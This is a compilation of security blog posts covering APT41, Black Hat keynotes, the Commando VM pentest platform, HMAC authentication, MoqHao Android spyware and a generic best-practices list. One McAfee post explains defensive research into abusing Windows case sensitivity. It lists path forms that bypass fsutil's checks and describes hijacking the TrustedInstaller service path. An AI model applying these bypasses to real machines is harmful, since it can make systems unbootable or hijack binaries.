A group of state-sponsored hackers in China ran activities for personal gain at the same time as undertaking spying operations for the Chinese government in 14 different countries, the cybersecurity firm FireEye has said.

In a report released on Thursday, the company said the hacking group APT41 was different to other China-based groups tracked by security firms in that it used non-public malware typically reserved for espionage to make money through attacks on video game companies.

Related: Australia joins condemnation of 'huge, audacious' Chinese hacking plot

Continue reading...

Live From Black Hat USA: Four Key Takeaways from Dino Dai Zovi’s Keynote

"Did you know that your 20th Black Hat is when you get to give the keynote at Black Hat?" Dino Dai Zovi, head of security for Cash App at Square, joked to the packed ballroom. While it may have been Dai Zovi's 20th conference, the topic of his keynote has never been more fitting for where we are in security and the ways in which it mirrors what we experience in our day-to-day life.

He gave us an overview of his history: in high school he realized that hacking and security was a lot more like magic than he previously thought, because it was about figuring out how things work, putting a lot of thought into writing and making something respond in the way you want it to. In college, he spent his nights, weekends, and spring breaks learning how to find and exploit vulnerabilities in code. And about that time (in 2007) he used his skills to simultaneously prove that Apple's OS X operating system could, indeed, be hacked and win a laptop for his friend in the Pwn2Own competition.  

No big deal.

Dai Zovi took his work as a security researcher into more corporate organizations, where he learned about the importance of automation, understanding what is really being asked for in order to solve the right problem, and ensuring that there is collaboration between security and development to achieve more quality outcomes. Here are the four key lessons that Dai Zovi learned as he transitioned from offense to defense.

Work backwards from the job: Dai Zovi talked about how McDonald's was working to understand how they should evolve their milkshake. What they noticed was that people were ordering them in the morning, and they wanted to see why this was happening. In discussions with a customer, the customer indicated that they needed to have breakfast on their morning commute. They had tried a banana, but it wasn't filling enough; a bagel was too dry, and spreading cream cheese while driving was too challenging; in giving doughnuts a shot, they found they were eating too may; but the McDonald's milkshake - unlike other milkshakes - was thick enough to last the full 40 minute drive to work and left them feeling full. As it turns out, they customer was not ordering a milkshake to satisfy hunger, but to cure boredom. Really try to understand your customer, who they are and where they struggle, and what you need to do to provide the best product or solution for them.

Seek and apply leverage: For this story, Dai Zovi took us back to his time with @stake, where when he first started he was essentially fuzzing by hand. He wanted to show off his skills, but when he realized that his colleague was completing his work - and finding more vulnerabilities - faster than him (and subsequently honing his foosball game) by using an automated technique. So Dai Zovi followed his lead and found that he was able to find more and do it more effectively. By using feedback loops, software, and automation you can really scale your impact.

Culture is more powerful than strategy which is more powerful than tactics: In one of the organizations he worked in, Dai Zovi was in a conversation with a developer who had been working on a feature but noticed it was coming out…a bit "sketchy." So the developer and security team white boarded out the feature and worked together to ensure that it was secure by design (shift left, anyone?). As security leaders, it's important that we focus on the security culture of our organizations. If we can create security culture change in every team, we can scale a lot more powerfully than we can if security is only security's responsibility.

Start with yes: We need to engage the world starting with yes. It keeps the conversation going, it keeps the conversation collaborative, and it keeps the conversation constructive. It says, "I want to work to solve the other problems you have, and I want to make you safe.” That's how we create real change and have a real impact.

"Why don't all security teams start with yes," Dai Zovi asked the audience. "Fear. There are lots of reasons to be afraid. But fear misguides us because it's irrational. Fear causes paralysis and creates more insecurity because it often leads to doing nothing."

For me, this was the most powerful takeaway. Dai Zovi talked about how he overcame his fear of flying by learning how to skydive. He felt the fear center in his brain activate and assured it that he would be fine: he had the right equipment and knowledge and knew that he would land safely. The more he jumped, the more he proved to his brain that he was safe and the fear dissipated.

Here is a truth about the human brain: we fear being rejected (or not belonging) and change above all else. There was a time when being outcast from the community meant certain death, and because change cannot be predicted, it cannot be planned for. As evolved as we have become, our brains have not kept up and we are all walking around with outdated technology that thinks that it should respond to change in the same way that it does being chased by a lion.

Ultimately, if we want to strengthen communication we need to first understand that we're all human and assume good intent. Everyone wants to feel safe and they want to belong, and these two desires can stop progress in its tracks. Yet being agile and objective, communicative and collaborative, are essential in today's changing threat landscape. The reality is, we need more innovation and teamwork in development and security - not less. Change is both an inevitable part of life and keeping software safe - we must be agile in our thinking and in our actions.

Stay tuned for more from Black Hat …

Live From Black Hat USA: Communication’s Key Role in Security

The kick-off keynote for the 23rd Black Hat USA Conference in Las Vegas set the stage for the conversations that will undoubtedly be discussed in great detail over the next two days - and likely the next two years - if Black Hat founder Jeff Moss’ opening remarks are indicative of a trend. Moss pointed out that security had been asking for the spotlight, both in legislative and more corporate settings, and the industry has had it for the last two years. However, it isn't enough to have the spotlight if you don't know how to harness it. In this case, what Moss was talking about is that how we communicate determines the outcomes we receive. He quipped that if you communicate well, then you may find yourself with more budget - and if you communicate poorly, you could find yourself fired.

Point taken.

Yet defining what cyber or security is remains an ongoing challenge, and Moss notes that oftentimes the language that we use causes us to think of a problem in a certain way, taking us in a direction we don't really want to be heading. He notes that while cyber, or information, is considered the Fifth Domain, it doesn't mean that it is equal to land, sea, air, and space. It's different and requires a different language and level of thinking. You can't use the language and laws of the sea to govern the laws of the Internet or how we engage there, because it is vastly different in nature. It's also vastly different depending on where you're engaging, assuming the Internet isn't simply … everywhere.

Moss told a story about how he was speaking with a colleague who told him about how in China, the money is in DDoS protection because attackers are using the "Great Firewall of China" to blackmail other Chinese companies. They're not worried about identity theft because they don't really have it: Chinese farmers sell their identity for 3,000 yen. Meaning that "all of the identities are legit, they're just not the person you think they are."

"You think might think the Internet works one way, and in one conversation it can flip upside down," Moss told the audience.

Simply put: we all have our perceptions, either individually or collectively, about what is needed when it comes to cybersecurity - and we're not communicating effectively about them. In order to fix this problem, we need to reorder the way that we think about things so that we can have more open and effective dialogue. As Moss said, "communication is a soft skill that leads to better technical outcomes."

Stay tuned for more from Black Hat …

Commando VM 2.0: Customization, Containers, and Kali, Oh My!

The Complete Mandiant Offensive Virtual Machine (“Commando VM”) swept the penetration testing community by storm when it debuted in early 2019 at Black Hat Asia Arsenal. Our 1.0 release made headway featuring more than 140 tools. Well now we are back again for another spectacular release, this time at Black Hat USA Arsenal 2019! In this 2.0 release we’ve listened to the community and implemented some new must have features: Kali Linux, Docker containers, and package customization.

About Commando VM

Penetration testers commonly use their own variants of Windows machines when assessing Active Directory environments. We specifically designed Commando VM to be the go-to platform for performing internal penetration tests. The benefits of using Commando VM include native support for Windows and Active Directory, using your VM as a staging area for command and control (C2) frameworks, more easily (and interactively) browsing network shares, and using tools such as PowerView and BloodHound without any worry about placing output files on client assets.

Commando VM uses Boxstarter, Chocolatey, and MyGet packages to install software and delivers many tools and utilities to support penetration testing. With over 170 tools and growing, Commando VM aims to be the de facto Windows machine for every penetration tester and red teamer.

Recent Updates

Since its initial release at Black Hat Asia Arsenal in March 2019, Commando VM has received three additional updates, including new tools and/or bug fixes. We closed 61 issues on GitHub and added 26 new tools. Version 2.0 brings three major new features, more tools, bug fixes, and much more!

Kali Linux

In 2016 Microsoft released the Windows Subsystem for Linux (WSL). Since then, pentesters have been trying to leverage this capability to squeeze more productivity out of their Window systems. The fewer Virtual Machines you need to run, the better. With WSL you can install Linux distributions from the Windows Store and run common Linux commands in a terminal such as starting up an SSH, MySQL or Apache server, automating mundane tasks with common scripting languages, and utilizing many other Linux applications within the same Windows system.

In January 2018, Offensive Security announced support for Kali Linux in WSL. With our 2.0 release, Commando VM officially supports Kali Linux on WSL. To get the most out of Kali, we've also included VcXsrv, an X Server that allows us to display the entire Linux GUI on the Windows Desktop (Figure 1). Displaying the Linux GUI and passing windows to Windows had been previously documented by Offensive Security and other professionals, and we have combined these to include the GUI as well as shortcuts to take advantage of popular programs such as Terminator (Figure 2) and DirBuster (Figure 3).


Figure 1: Kali XFCE on WSL with VcXsrv


Figure 2: Terminator on Commando VM – Kali WSL with VcXsrv


Figure 3: DirBuster on Commando VM – Kali WSL with VcXsrv

Docker

Docker is becoming increasingly popular within the penetration testing community. Multiple blog posts exist detailing interesting functionality using Docker for pentesting. Based on its popularity Docker has been on our roadmap since the 1.0 release in March 2019, and we now support it with our release of Commando VM 2.0. We pull tools such as Amass and SpiderFoot and provide scripts to launch the containers for each tool. Figure 4 shows an example of SpiderFoot running within Docker.


Figure 4: Impacket container running on Docker

For command line docker containers, such as Amass, we created a PowerShell script to automatically run Amass commands through docker. This script is also added to the PATH, so users can call amass from anywhere. This script is shown in Figure 5. We encourage users to come up with their own scripts to do more creative things with Docker.


Figure 5: Amass.ps1 script

This script is also executed when the shortcut is opened.


Figure 6: Amass Docker container executed via PowerShell script

Customization

Not everyone needs all of the tools all of the time. Some tools can extend the installation process by hours, take up many gigabytes of hard drive space, or come with unsuitable licenses and user agreements. On the other hand, maybe you would like to install additional reversing tools available within our popular FLARE VM; or you would prefer one of the many alternative text editors or browsers available from the chocolatey community feed. Either way, we would like to provide the option to selectively install only the packages you desire. Through customization you and your organization can also share or distribute the profile to make sure your entire team has the same VM environment. To provide for these scenarios, the last big change for Commando 2.0 is the support for installation customization. We recommend using our default profile, and removing or adding tools to it as you see fit. Please read the following section to see how.

How to Create a Custom Install

Before we start, please note that after customizing your own edition of Commando VM, the cup all command will only upgrade packages pre-installed within your customized distribution. New packages released by our team in the future will not be installed or upgraded automatically with cup all. When needed, these new packages can always be installed manually using the cinst or choco install command, or by adding them to your profile before a new install.

Simple Instructions

  1. Download the zip from https://github.com/fireeye/commando-vm into your Downloads folder.
  2. Decompress the zip and edit the ${Env:UserProfile}\Downloads\commando-vm-master\commando-vm-master\profile.json file by removing tools or adding tools in the “packages” section. Tools are available from our package list or from the chocolatey repository.
  3. Open an administrative PowerShell window and enable script execution.
    • Set-ExecutionPolicy Unrestricted -f
  4. Change to the unzipped project directory.
    • cd ${Env:UserProfile}\Downloads\commando-vm-master\commando-vm-master\
  5. Execute the install with the -profile_file argument.
    • .\install.ps1 -profile_file .\profile.json

Detailed Instructions

To start customizing your own distribution, you need the following three items* from our public GitHub repository:

  1. Our install.ps1 script
  2. Our sample profile.json
  3. An installation template. We recommend using commandovm.win10.install.fireeye.

*Note: If you download the project ZIP from GitHub it will contain all three items.

The install script will now support an optional -profile_file argument, which specifies a JSON profile. Without the -profile_file argument, running .\install.ps1 will install the default Commando VM distribution. To customize your edition of Commando VM, you need to create a profile in JSON format, and then pass that to the -profile_file argument. Let us explore the sample profile.json profile (Figure 7).


Figure 7: profile.json profile

This JSON profile starts with the env dictionary which specifies many environment variables used by the installer. These environment variables can, and should, be left to their default values. Here is a list of the supported environment variables:

  • VM_COMMON_DIR specifies where the shared libraries should be installed on the VM. After a successful install, you will find a FireEyeVM.Common directory within this location. This contains a PowerShell module that is shared by our packages.
  • TOOL_LIST_DIR and TOOL_LIST_SHORTCUT specify which directory contains the list of all installed packages within the Start Menu and the name of the desktop shortcut, respectively.
  • RAW_TOOLS_DIR environment variable specifies the location where some tools will be installed. Chocolatey defaults to installing tools in %ProgramData%\Chocolatey\lib. This environment variable by default points to %SystemDrive%\Tools, allowing you to more easily access some tools on the command line.
  • And, finally, TEMPLATE_DIR specifies a template package directory relative to where install.ps1 is on disk. We strongly recommend using the commandovm.win10.installer.fireeye package available on our GitHub repository as the template. If your VM is running Windows 7, please switch to the appropriate commandovm.win7.installer.fireeye package. If you are feeling “hacky” and adventurous, feel free to customize the installer further by modifying the chocolateyinstall.ps1 and chocolateyuninstall.ps1 scripts within the tools directory of the template. Note that a proper template will be a folder containing at least 5 things: (1) a properly formatted nuspec file, (2) a “tools” folder that contains (3) a chocolateyinstall.ps1 file, (4) a chocolateyuninstall.ps1 file, and (5) a profile.json file. If you use our template, the only thing you need to change is the packages.json file. The easiest way to do this is just download and extract the commando-vm zip file from GitHub.

With the packages variables set, you can now specify which packages to install on your own distribution. Some packages accept additional installation arguments. You can see an example of this by looking at the openvpn.fireeye entry. For a complete list of packages available from our feed, please see our package list.

Once you finish modifying your profile, you are ready for installation. Run powershell.exe with elevated privileges and execute the following commands to install your own edition of Commando VM, assuming you saved your version of the profile named: myprofile.json (Figure 8).


Figure 8: Example myprofile.json

The myprofile.json file can then be shared and distributed throughout your entire organization to ensure everyone has the same VM environment when installing Commando VM.

Conclusion

Commando VM was originally designed to be the de facto Windows machine for every penetration tester and red teamer. Now, with the addition of Kali Linux support, Docker and installation customization, we hope it will be the one machine for all penetration testers and red teamers. For a complete list of tools, and for the installation script, please see the Commando VM GitHub repository. We look forward to addressing user feedback, adding more tools and features, and creating many more enhancements for this Windows attack platform.

Detailing Veracode’s HMAC API Authentication

Veracode’s RESTful APIs use Hash-based Message Authentication Code (HMAC) for authentication, which provides a significant security advantage over basic authentication methods that pass the username and password with every request. Passing credentials in the clear is not a recommended practice from a security perspective; encryption is definitely preferred for obvious reasons, but HMAC goes a step further and passes just a unique signature. 

Developers familiar with Amazon Web Services (AWS) may already have experience with this method of authentication, as it is the primary method used by AWS.  In fact, Veracode began providing users the ability to use HMAC authentication when utilizing our suite of integration products and Java/C# SDKs in early 2016.

What Is HMAC Authentication?

With Hash-based Message Authentication Code (HMAC), the server and the client share a public ID and a private Secret Key (for more information on obtaining an ID and Secret Key with Veracode, please see our help center).  Unlike a password with basic authentication, the Secret Key is known by the server and client, but is never transmitted.  Rather than sending the Secret Key in the request, it is instead used in combination with a hash function to generate a unique HMAC signature, which is then combined with the public ID, a nonce, and additional information.  The server ultimately receives the request and generates its own HMAC and compares the two – if equal, the request is executed (this process is referred to as the “secret handshake”).  Thus, the Secret Key is used in confirming authenticity and integrity of a request, but never transmitted in that request.  For more information about HMAC, please visit this link.

How Does HMAC Authentication Affect Me?

HMAC provides significant security improvements when making API calls to Veracode.  While more secure than basic authentication, additional steps are required to perform API calls using HMAC.  Veracode does minimize and streamline the HMAC calculation to make this process simple and easy for users. In fact, there are several examples of HMAC authentication code or sample libraries available for your reference in the Veracode Help Center and on our Github page:

If you are looking to use curl or a similar command line tool to execute Veracode API calls, we recommend using HTTPie with the Veracode Python Authentication Library.

If you have any questions about implementing HMAC and Veracode ID and Key, please post in the Veracode Community Integrations Group  - if you haven’t yet, you are welcome to join the community

MoqHao Related Android Spyware Targeting Japan and Korea Found on Google Play

The McAfee mobile research team has found a new type of Android malware for the MoqHao phishing campaign (a.k.a. XLoader and Roaming Mantis) targeting Korean and Japanese users. A series of attack campaigns are still active, mainly targeting Japanese users. The new spyware has very different payloads from the existing MoqHao samples. However, we found evidence of a connection between the distribution method used for the existing campaign and this new spyware. All the spyware we found this time pretends to be security applications targeting users in Japan and Korea. We discovered a phishing page related to DNS Hijacking attack, designed to trick the user into installing the new spyware, distributed on the Google Play store.

Fake Japanese Security Apps Distributed on Google Play

We found two fake Japanese security applications. The package names are com.jshop.test and com.jptest.tools2019. These packages were distributed on the Google Play store. The number of downloads of these applications was very low. Fortunately, the spyware apps had been immediately removed from the Google Play store, so we acquired the malicious bullets thanks to the Google Android Security team.

Figure 1. Fake security applications distributed on Google Play

This Japanese spyware has four command and control functions. Below is the server command list used with this spyware. The spyware attempts to collect device information like IMEI and phone number and steal SMS/MMS messages on the device. These malicious commands are sent from a push service of Tencent Push Notification Service.

Figure 2. Command registration into mCommandReceiver

Table 1. The command lists

*1 Not implemented correctly due to the difference from the functionality guessed from the command name

We believe that the cybercriminal included minimal spyware features to bypass Google’s security checks to distribute the spyware on the Google Play store, perhaps with the intention of adding additional functionality in future updates, once approved.

Fake Korean Police Apps

Following further investigation, we found other very similar samples to the above fake Japanese security applications, this time targeting Korean users. A fake Korean police application disguised itself as an anti-spyware application. It was distributed with a filename of cyber.apk on a host server in Taiwan (that host has previously been associated with malicious phishing domains impersonating famous Japanese companies). It used the official icon of the Korean police application and a package name containing ‘kpo’, along with references to com.kpo.scan and com.kpo.help, all of which relate to the Korean police.

Figure 3. This Korean police application icon was misappropriated

The Trojanized package was obfuscated by the Tencent packer to hide its malicious spyware payload. Unlike the existing samples used in the MoqHao campaign, where the C&C server address was simply embedded in the spyware application; MoqHao samples hide and access the control server address via Twitter accounts.

The malware has very similar spyware functionality to the fake Japanese security application. However, this one features many additional commands compared to the Japanese one. Interestingly, the Tencent Push Service is used to issue commands to the infected user.

Figure 4. Tencent Push Service

The code and table below show characteristics of the server command and content list.

Figure 5. Command registration into mCommandReceiver

Table 2. The command lists

*1 Seems to be under construction due to the difference from the functionality guessed from the command name

There are several interesting functions implemented in this spyware. To execute an automated phone call function on a default calling application, KAutoService class has an implementation to check content in the active window and automatically click the start call button.

Figure 6. KAutoSevice class clicks start button automatically in the active calling application

Another interesting function attempts to disable anti-spam call applications (e.g. whowho – Caller ID & Block), which warns users if it is suspicious in the case of incoming calls from an unknown number. The disable function of these call security applications in the spyware allows cyber criminals to make a call without arousing suspicion as no alert is issued from the anti-spam call apps, thus increasing the success of social engineering.

Figure 7. Disable anti-spam-call applications

Figure 8. Disable anti-spam-call applications

Table 3. List of disabled anti-spam call applications

Connection with Active MoqHao Campaigns

The malware characteristics and structures are very different from the existing MoqHao samples. We give special thanks to @ZeroCERT and @ninoseki, without who we could not have identified the connection to the active MoqHao attack and DNS hijacking campaigns. The server script on the phishing website hosting the fake Chrome application leads victims to a fake Japanese security application on the Google Play store (https://play.google.com/store/apps/details?id=com.jptest.tools2019) under specific browser conditions.

Figure 9. The server script redirects users to a fake security application on Google Play (Source: @ninoseki)

There is a strong correlation between both the fake Japanese and Korean applications we found this time. This malware has common spy commands and shares the same crash report key on a cloud service. Therefore, we concluded that both pieces of spyware are connected to the ongoing MoqHao campaigns.

Conclusion

We believe that the spyware aims to masquerade as a security application and perform spy activities, such as tracking device location and eavesdropping on call conversations. It is distributed via an official application store that many users trust. The attack campaign is still ongoing, and it now features a new Android spyware that has been created by the cybercriminals. McAfee is working with Japanese law enforcement agencies to help with the takedown of the attack campaign. To protect your privacy and keep your data from cyber-attacks, please do not install apps from outside of official application stores. Keep firmware up to date on your device and make sure to protect it from malicious apps by installing security software on it.

McAfee Mobile Security detects this threat as Android/SpyAgent and alerts mobile users if it is present, while protecting them from any data loss. For more information about McAfee Mobile Security, visit https://www.mcafeemobilesecurity.com

Appendix – IOCs

Table 4. Fake Japanese security application IOCs

Table 5. Fake Korean police application IOCs

The post MoqHao Related Android Spyware Targeting Japan and Korea Found on Google Play appeared first on McAfee Blogs.

APT41: A Dual Espionage and Cyber Crime Operation

Today, FireEye Intelligence is releasing a comprehensive report detailing APT41, a prolific Chinese cyber threat group that carries out state-sponsored espionage activity in parallel with financially motivated operations. APT41 is unique among tracked China-based actors in that it leverages non-public malware typically reserved for espionage campaigns in what appears to be activity for personal gain. Explicit financially-motivated targeting is unusual among Chinese state-sponsored threat groups, and evidence suggests APT41 has conducted simultaneous cyber crime and cyber espionage operations from 2014 onward.

The full published report covers historical and ongoing activity attributed to APT41, the evolution of the group’s tactics, techniques, and procedures (TTPs), information on the individual actors, an overview of their malware toolset, and how these identifiers overlap with other known Chinese espionage operators. APT41 partially coincides with public reporting on groups including BARIUM (Microsoft) and Winnti (Kaspersky, ESET, Clearsky).

Who Does APT41 Target?

Like other Chinese espionage operators, APT41 espionage targeting has generally aligned with China's Five-Year economic development plans. The group has established and maintained strategic access to organizations in the healthcare, high-tech, and telecommunications sectors. APT41 operations against higher education, travel services, and news/media firms provide some indication that the group also tracks individuals and conducts surveillance. For example, the group has repeatedly targeted call record information at telecom companies. In another instance, APT41 targeted a hotel’s reservation systems ahead of Chinese officials staying there, suggesting the group was tasked to reconnoiter the facility for security reasons.

The group’s financially motivated activity has primarily focused on the video game industry, where APT41 has manipulated virtual currencies and even attempted to deploy ransomware. The group is adept at moving laterally within targeted networks, including pivoting between Windows and Linux systems, until it can access game production environments. From there, the group steals source code as well as digital certificates which are then used to sign malware. More importantly, APT41 is known to use its access to production environments to inject malicious code into legitimate files which are later distributed to victim organizations. These supply chain compromise tactics have also been characteristic of APT41’s best known and most recent espionage campaigns.

Interestingly, despite the significant effort required to execute supply chain compromises and the large number of affected organizations, APT41 limits the deployment of follow-on malware to specific victim systems by matching against individual system identifiers. These multi-stage operations restrict malware delivery only to intended victims and significantly obfuscate the intended targets. In contrast, a typical spear-phishing campaign’s desired targeting can be discerned based on recipients' email addresses.

A breakdown of industries directly targeted by APT41 over time can be found in Figure 1.

 


Figure 1: Timeline of industries directly targeted by APT41

Probable Chinese Espionage Contractors

Two identified personas using the monikers “Zhang Xuguang” and “Wolfzhi” linked to APT41 operations have also been identified in Chinese-language forums. These individuals advertised their skills and services and indicated that they could be hired. Zhang listed his online hours as 4:00pm to 6:00am, similar to APT41 operational times against online gaming targets and suggesting that he is moonlighting. Mapping the group’s activities since 2012 (Figure 2) also provides some indication that APT41 primarily conducts financially motivated operations outside of their normal day jobs.

Attribution to these individuals is backed by identified persona information, their previous work and apparent expertise in programming skills, and their targeting of Chinese market-specific online games. The latter is especially notable because APT41 has repeatedly returned to targeting the video game industry and we believe these activities were formative in the group’s later espionage operations.


Figure 2: Operational activity for gaming versus non-gaming-related targeting based on observed operations since 2012

The Right Tool for the Job

APT41 leverages an arsenal of over 46 different malware families and tools to accomplish their missions, including publicly available utilities, malware shared with other Chinese espionage operations, and tools unique to the group. The group often relies on spear-phishing emails with attachments such as compiled HTML (.chm) files to initially compromise their victims. Once in a victim organization, APT41 can leverage more sophisticated TTPs and deploy additional malware. For example, in a campaign running almost a year, APT41 compromised hundreds of systems and used close to 150 unique pieces of malware including backdoors, credential stealers, keyloggers, and rootkits.

APT41 has also deployed rootkits and Master Boot Record (MBR) bootkits on a limited basis to hide their malware and maintain persistence on select victim systems. The use of bootkits in particular adds an extra layer of stealth because the code is executed prior to the operating system initializing. The limited use of these tools by APT41 suggests the group reserves more advanced TTPs and malware only for high-value targets.

Fast and Relentless

APT41 quickly identifies and compromises intermediary systems that provide access to otherwise segmented parts of an organization’s network. In one case, the group compromised hundreds of systems across multiple network segments and several geographic regions in as little as two weeks.

The group is also highly agile and persistent, responding quickly to changes in victim environments and incident responder activity. Hours after a victimized organization made changes to thwart APT41, for example, the group compiled a new version of a backdoor using a freshly registered command-and-control domain and compromised several systems across multiple geographic regions. In a different instance, APT41 sent spear-phishing emails to multiple HR employees three days after an intrusion had been remediated and systems were brought back online. Within hours of a user opening a malicious attachment sent by APT41, the group had regained a foothold within the organization's servers across multiple geographic regions.

Looking Ahead

APT41 is a creative, skilled, and well-resourced adversary, as highlighted by the operation’s distinct use of supply chain compromises to target select individuals, consistent signing of malware using compromised digital certificates, and deployment of bootkits (which is rare among Chinese APT groups).

Like other Chinese espionage operators, APT41 appears to have moved toward strategic intelligence collection and establishing access and away from direct intellectual property theft since 2015. This shift, however, has not affected the group's consistent interest in targeting the video game industry for financially motivated reasons. The group's capabilities and targeting have both broadened over time, signaling the potential for additional supply chain compromises affecting a variety of victims in additional verticals.

APT41's links to both underground marketplaces and state-sponsored activity may indicate the group enjoys protections that enables it to conduct its own for-profit activities, or authorities are willing to overlook them. It is also possible that APT41 has simply evaded scrutiny from Chinese authorities. Regardless, these operations underscore a blurred line between state power and crime that lies at the heart of threat ecosystems and is exemplified by APT41.

The Twin Journey, Part 2: Evil Twins in a Case In-sensitive Land

In the first of this 3-part blog series, we covered the implications of promoting files to “Evil Twins” where they can be created and remain in the system as different entities once case sensitiveness is enabled.

In this 2nd post we try to abuse applications that do not work well with CS changes, abusing years of “normalization” assumptions.

It is worth noting that the impact of this change will vary depending on the target folder.

Out of the box, Windows provides a tool to change CS information by invoking the underlying API NtSetFileInformation with FILE_CASE_SENSITIVE_INFORMATION flags.

This tool contains several checks at user-mode level to restrict the target folder but, as usual, it can be easily bypassed using different path combinations. It is possible to create a tool or invoke the API from PowerShell to remove these checks.

Let us go over the following scenarios:

  • Changing ROOT drive CS:
    1. fsutil restrictions will be bypassed and most of the console will not work unless you specify full paths (mostly due to environment variables broken on case-sensitiveness).

  • Combinations to bypass this check include:
    • \\?\C:\ (by drive letter with long path)
    • \\.\BootPartition\\  (by partition)
    • \\?\Volume{3fb4edf7-edf1-4083-84f8-7fbca215bfee}\ (volume id)
  • Change “protected folders” CS.
    1. For some folders is not enough to be Administrator, but to have other type of ACL’s instead.
    2. TrustedInstaller has the required permissions to do so and… you just need Admin permissions to change the service path:

If you change Windows folder case sensitiveness by using the same technique, Windows will not boot anymore.

These scenarios introduce new unexpected behaviors in the current applications, like for instance:

  • There is a folder with CS enabled and two directories with the same name, different case.
  • Trying to change CS will fail due to “multiple files/folders with the same name already exists” check.
  • Move to recycle bin on one of the folders.
  • Change CS of the folder.
  • Restore the deleted file.
  • The contents of the deleted file overwrite the one originally kept.

Screenshots

Left: Root drive with case sensitive enabled.

Right: Program Files CS changed thanks to Trusted Installer ACL. If an application is not considering the proper case, next time it tries to execute a binary whose name may be normalized (to uppercase) it can spawn a different app.

Watch the video recorded by our expert Cedric Cochin illustrating this technique:

Protection and Detection with McAfee Products

  • Products that rely on SysCore will protect C:\ from case sensitive changes
  • Endpoint Security Expert Rules
  • Active Response:
    • Create a custom collector to query Case sensitiveness of important folders.
    • Search for fsutil executions (or even History Processes if that collector is part of your Active Response version)
      • “Processes where Processes name equals fsutil.exe”
    • MVISION EDR:
      • Realtime search
        • “Processes where Processes name equals fsutil.exe”
      • Search for fsutil execution in the historical view

Artifacts involved:

  • NT attributes change
  • Fsutil execution
  • Trusted Installer service changes

Outcomes for this technique include:

  • A ransomware could create C:\Windows\SYSTEM32 and cause a BSOD on next restart
  • Change dll being loaded or an event stops application from starting

The post The Twin Journey, Part 2: Evil Twins in a Case In-sensitive Land appeared first on McAfee Blogs.

7 Cybersecurity Practices to Protect Organizations from Future Threats

Image Source: Freepik

Cybersecurity is the process of protecting and defending an enterprise’s use of cyberspace by detecting, preventing and responding to any of the malicious attacks like disabling, disrupting, injecting malware, or anything thing else aimed to harm the organization.

At its center, cybersecurity defends your organization from vicious and threat attacks aimed to disrupt and steal information from your organization. Cybersecurity risks are similar to financial and reputational risks as it could directly affect the organization’s growth, driving the costs up and adversely affecting the revenue.

If you’re a part of an organization, and especially, if your workplace stocks sensitive information of individuals or clients involved, then this is an ideal time to educate yourself regarding cybersecurity and ways to safeguard your organization against cyber attacks and threats with the help of professionals who hold cybersecurity certifications.

  1. Enable Firewall

In football, there’s a famous phrase- “Attack is the first line of defense.” and in the scenario of cybersecurity, the firewall serves the very same purpose. The firewall protects unauthorized access to your system, mail services, and websites. In addition to the external firewall, considering installing internal firewalls for the work network as well as on for your home network, in cases if employees decide to work remotely.

  1. Conduct Cybersecurity Awareness Training

According to a recent survey, 77% of those who took part admitted that they use free public WiFi networks to access work-related documents or have connected their corporate devices to such networks which are most often unsecured. Only 17% of them said that they use a VPN when outside the office.

 

33% of insider threat attacks have caused due to mistakes or irrationality from the employees; these mistakes are preventable. As per the SANS, cybersecurity experts have reported that their knowledge programs have made a tangible impact on the organization’s security.

  1. Back-Up Company Data

It is one of the prioritized security practices among cybersecurity professionals. Backing up your data could be a lifesaver. In the advent of Trojan horses and Ransomware, small mistakes could lead to complete data wipeout.

 

Handling the back-up data is also equally important. Make sure back-ups are thoroughly protected, encrypted, and updated frequently.

  1. Multi-Factor Authentication

MFA (Multi-factor authentication) is considered to be one of the prominent cybersecurity practices among professionals. MFA adds an extra layer of protection to any data that is protected by this means.

 

Even in an unfortunate situation if any malicious attack gets to your sensitive data, it would further require to pass additional authentication layers of security to get to the actual data and cause any harm. Also, these practices are notification enabled, and any susceptible attempt is reported to the user by multiple communication channels.

  1. Bring Your Own Device (BYOD) Policies 

BYOD policies have been around since 2004, and ever since it has managed only to boom among the corporate culture. It is predicted that by 2022, the BYOD market will hit $367B. Also, research data has it that the companies who opt for BYOD, save $350/year for every employee.

Sure, letting the employees use their own devices for work increases their productivity, but it does make the organization’s data susceptible to cyber attacks. With the increasing use of the mobile device, smartwatches, and wearables, and IoT products companies that are serious about BYOD or using cloud storage, in general, should consider the security vulnerability and implement stringent policies to protect their valuable information. MDM (Mobile Device Management) software enables the cybersecurity or the IT team to implement security settings and configurations that let them secure all devices connected to company networks

  1. Manage Passwords

Changing passwords is a pain, and employees often distance themselves from such action unless the HR or the IT team forcefully sit next to them and make them change their passwords.

Password management is a critical part of corporate security, and in today’s BYOD world, it is essential to be extra cautious about data protection. Privileged access accounts are diamond mine for the attackers, and when it comes to the security of these accounts, unauthorized access could doom the growth of the organization.

  1. Document Cybersecurity Policies

Business often operates on verbal bases when it comes to security while ideally, they should be considering documenting every policy and training operations related to cyberspace. Multiple online portals like the Small Business Administration (SBA) & FCC’s Cyberplanner 2.0 Cybersecurity portal provides checklists, online instruction, and information distinct to protect online businesses.

Conclusion

Always remember the fact that one unsafe click could result in complete data wipeout or leak, and education yourselves about the cybersecurity practices that could help your organization prevent itself from threats. Not just to an organization’s security, it is also helpful to any individual who uses the internet. Keeping yourselves afloat regarding such practices is a part of the job as all kinds of engagement is slowly and swiftly happening on the cloud.

For additional information, please refer to an article on Cyber security tips you need to know in 2019, published by the Australian UpSkilled institute.


 

Author Bio:

Gaurav Belani is a senior SEO and content marketing analyst at The 20 Media, a content marketing agency that specializes in data-driven SEO. He has more than seven years of experience in digital marketing and loves to read and write about AI, ML, cybersecurity and other emerging technologies. In his spare time, he enjoys watching movies and listening to music. Connect with him on Twitter @belanigaurav.

 

The post 7 Cybersecurity Practices to Protect Organizations from Future Threats appeared first on CyberDB.

The McAfee Americas Channel Promise

In my 26th year at McAfee, my fourth leading the Americas Channel Organization, I wanted to take a step back and ask my team a few questions:

  • What does being a part of the McAfee Channel team mean to our partners, to our company, and to our channel employees?
  • Why do we do what we do?
  • What value do we bring?

Over the course of eight weeks, I worked with the core Americas Channel management team and a third-party vendor to frame out the McAfee Americas Channel Promise. This exercise forced us to dig deep into our organization and define what matters, articulate the value of our channel, and more. I would like to share what we launched last month at the Americas Channel All Hands event, because I hope it’s something you can attach yourselves to as a McAfee partner.

I AM McAfee Channel

The Americas Channel is a vital growth engine for increasing market share for McAfee.

We Bring

Scale and market presence

Competitive insights

Deeper customer advocacy

Operational and financial stability

Managed services

Advocacy for partners

Our Value Proposition

Together, we will deliver on our customers’ business outcomes. The channel provides McAfee with the ability to scale effectively and efficiently with our McAfee differentiators. The best way to achieve scale is through a robust, purpose-built channel.

